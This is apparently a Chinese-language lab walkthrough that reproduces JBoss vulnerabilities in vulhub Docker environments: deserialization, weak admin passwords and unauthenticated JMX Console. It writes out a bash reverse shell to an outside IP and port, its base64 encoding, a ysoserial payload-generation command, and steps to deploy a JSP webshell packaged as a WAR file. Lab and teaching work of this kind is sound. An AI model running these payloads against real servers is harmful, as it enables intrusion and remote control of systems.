Jboss
Jboss介绍
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
3.1 CVE-2015-7501
Jboss JMXInvokerServlet 反序列化漏洞
漏洞介绍
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的 Gadget 执行任意代码
影响范围
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0
环境搭建
cd vulhub/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
漏洞复现
http://192.168.0.154:8080/
1.POC,访问地址
http://192.168.0.154:8080/invoker/JMXInvokerServlet
返回如下,说明接⼝开放,此接⼝存在反序列化漏洞
2.下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >&/dev/tcp/82.157.209.141/4444 0>&1
YmFzaCAtaSA+Ji9kZXYvdGNwLzgyLjE1Ny4yMDkuMTQxLzQ0NDQgMD4mMQ==
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzgyLjE1Ny4yMDkuMTQxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser
3.2 CVE-2017-7504
环境搭建
cd vulhub/jboss/CVE-2017-7504
docker-compose up -d
漏洞复现
1.访问漏洞地址
http://192.168.0.154:8080/jbossmq-httpil/HTTPServerILServlet
python3 jexboss.py -u http://192.168.0.154:8080/
3.4 Administration Console弱⼝令
漏洞描述
Administration Console管理⻚⾯存在弱⼝令,admin:vulhub
,登陆后台上传war包 , getshell
影响版本
全版本
环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
密码⽂件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
漏洞复现
http://1.15.136.212:8080/admin-console/login.seam?conversationId=4
3.5 低版本JMX Console未授权
3.6 ⾼版本JMX Console未授权
漏洞描述
JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell
影响版本
Jboss6.x以下
环境搭建
cd vulhub/jboss/CVE-2017-12149
docker-compose up -d
漏洞复现
http://1.15.136.212:8080/jmx-console/
因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub
1.本地搭建部署点
2.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署
用冰蝎生成jsp木马—>压缩到zip中—>改后缀名为.war
PS:完任务版。下次一定做完。